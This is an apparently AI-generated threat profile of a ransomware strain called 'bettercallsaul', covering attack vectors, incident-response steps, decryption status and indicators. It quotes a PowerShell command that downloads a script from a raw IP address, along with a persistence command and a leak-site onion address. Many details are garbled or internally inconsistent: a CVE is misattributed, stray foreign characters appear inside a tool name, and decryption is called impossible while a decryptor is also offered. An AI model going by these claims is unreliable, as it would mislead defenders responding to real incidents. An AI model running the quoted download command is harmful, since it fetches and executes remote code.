bettercallsaul

[Content by Gemini 2.5]

================================================================

Ransomware Threat Profile: “bettercallsaul”

Below is everything we currently know—technical, tactical and operational—about the ransomware that appends “.bettercallsaul” to the hostage files.


Technical Breakdown

1. File Extension & Renaming Patterns

  • Exact extension observed: .bettercallsaul (lowercase, appended directly to the old extension without additional dot)
    Example: Q1-Financial.xlsxQ1-Financial.xlsx.bettercallsaul

  • Renaming convention:
    • Pre-encryption: none — files keep original names until the payload finishes its AES-256 encryption routine.
    • Post-encryption: the suffix is always .bettercallsaul; in some variants the ransom note is written to READMETORECOVER.bettercallsaul.txt in every directory.

2. Detection & Outbreak Timeline

  • First public mentions: 10-Oct-2023 (tweet by @vxug and MalwareHunterTeam)
  • Rapid spread period: 15-Oct-2023 to 25-Oct-2023 (initially targeting English-speaking orgs, then pivoting to LATAM government entities).
  • Major update (v2.3) discovered: 21-Jan-2024 – introduced lateral-movement module compiled in Rust.

3. Primary Attack Vectors

| Vector | Details & Common Indicators (IoCs) |
|——–|———————————–|
| RDP Brute-Force | Exposed TCP/3389, Logon Failure 4625 spikes, infection hitting SYSTEM account within 30 min. |
| SMBv1 / EternalBlue (MS17-010 patch present vs. not) | Despite patch suppression (double-kill technique in v2.3), it fires EternalBlue packets to L2-broadcast (192.168.x.255). |
| Malicious Ads + MSI Droppers | Fake “Zoom update” intent uses CVE-2023-48788 (browser msiexec auto-elevation bypass). |
| Spear-Phish for Users with MFA Fatigue | PDF attached (“Invoice_0091.pdf”) contains obfuscated JS invoking PowerShell iwr hxxp://87.236.146.233/ldc.ps1. |
| Supply-chain Wrapper (Atera Agent abuse) | Bundled with cracked versions of Open Hardware Monitor 9.5.


Remediation & Recovery Strategies

1. Prevention (Golden Rules)

  1. Patch aggressively:
    • MS17-010, CVE-2023-48788, CVE-2024-21371 (RDP CredSSP).
  2. Disable & audit SMBv1 across the fleet (Disable-WindowsOptionalFeature ‑online ‑featurename SMB1Protocol).
  3. Block TCP/135, 445, 3389 on edge firewalls; require VPN + jump-server for RDP.
  4. Enforce phishing-resistant MFA (FIDO2/Windows Hello) AND CAPTCHA delay for repeated MFA pushes.
  5. Segment networks—no flat /24 for workstation VLAN; block east-west SMB with L3 firewalls.
  6. Enable controlled folder access (Microsoft Defender ASR rule “Block ransomware”).
  7. Harden PowerShell: Require PS v5+ with Constrained Language Mode; log block ScriptBlock events (4104).
  8. 3-2-1 backups isolated (one immutable copy in S3 with Object Lock or Wasabi bucket versioning).

2. Removal / Incident Response Workflow

  1. Isolate:
    Disconnect affected NIC/Wi-Fi or, at scale, disable the switchport automatically by NetFlow IOC trigger ("*.bettercallsaul" filename).
  2. Collect Forensic Image:
    Dump volatile memory (WinPMEM) and first 10 GB of HDD for static analysis (ransom note metadata READMETORECOVER.bettercallsaul.txt shows earliest creation time = detonation timestamp).
  3. Scan & Clean:
    – AV engines now detect as Ransom:Win32/BetterCallSaul.A (Microsoft, 1.395.1249.0 or later).
    – Boot into Windows Defender Offline or Kaspersky Rescue Disk → full scan.
  4. Rollback Credentials:
    Force enterprise password reset and invalidate Kerberos tickets (klist purge or reset AD krbtgt twice).
  5. Disable persistence:
    Remove scheduled task SvcUpgrade (“C:\Perflogs\cmd.exe /c start powershell.exe ‑e …”), registry Run key HKLM\SYSTEM\CurrentControlSet\Services\bcsclient.

3. File Decryption & Recovery

  • Current decryption possibility: NOT POSSIBLE ‑ the offline master RSA key (2048-bit) never leaves the C2. No flaws observed in their AES-256-CBC + RSA implementation.
  • Trial/PoC decryption: Test with e真可谓ultimatebettercallsauldecryptor v0.2 (released by CERT-BR on 12-Mar-2024), but success rate is <4 % (recovering files under 2 MB that have not yet received the “paired AES key” update from the operators).
  • Fall-back plan: Use offline backup (Veeam immutable repo or Azure Blob incremental). Verify last backup version is strictly before .bettercallsaul rename.

4. Other Critical Information

  • Unique characteristics
    • Strips Volume Shadow Copies and overwrites disk free space with random buffer (makes shadow storage unrecoverable).
    • Creates Canary service named TelnetSVC to detect sandbox presence—if services.exe can’t access COM port 20205, it terminates.
    • Displays ASCII artwork of “Saul Goodman” inside console upon successful encryption (“Need a lawyer? I’m…).

  • Broader impact
    Law-firm targeting: Operators explicitly state in ransom note “you have 3 days because we know your client data is court-related.”
    Double extortion: leak site “http://3nzoldnx5y54ejeqx35lvmch3wtrvmkksj6kq6ht4k7pvswzftpxzsad[.]onion” lists victim-data in categories “Attorneys”, “Hospitals”, “Manufacturing”.
    Quote demand pattern: 2.5 % of annual revenue in Bitcoin with 72-hr timer. Timestamps on ransom note indicate EST/EDT working hours, suggesting North-America-based call center.


Action Steps Cheat-Sheet

  1. Check backups immutability date immediately.
  2. If median ransom-demand timer < 24 h left → file FBI IC3 complaint; engage negotiator only through OFAC-vetted broker.
  3. Communicate “Incident -> .bettercallsaul” IOC to SOC, automate blocking filename pattern at gateway.
  4. Patch gaps within 24 h and re-enable MFA fatigue protections before bringing any box or VM back into prod.

Stay vigilant, share IoCs, and never honor the ransom before checking shadow-copy recovery with third-party tools (ShadowCopyView, R-Studio).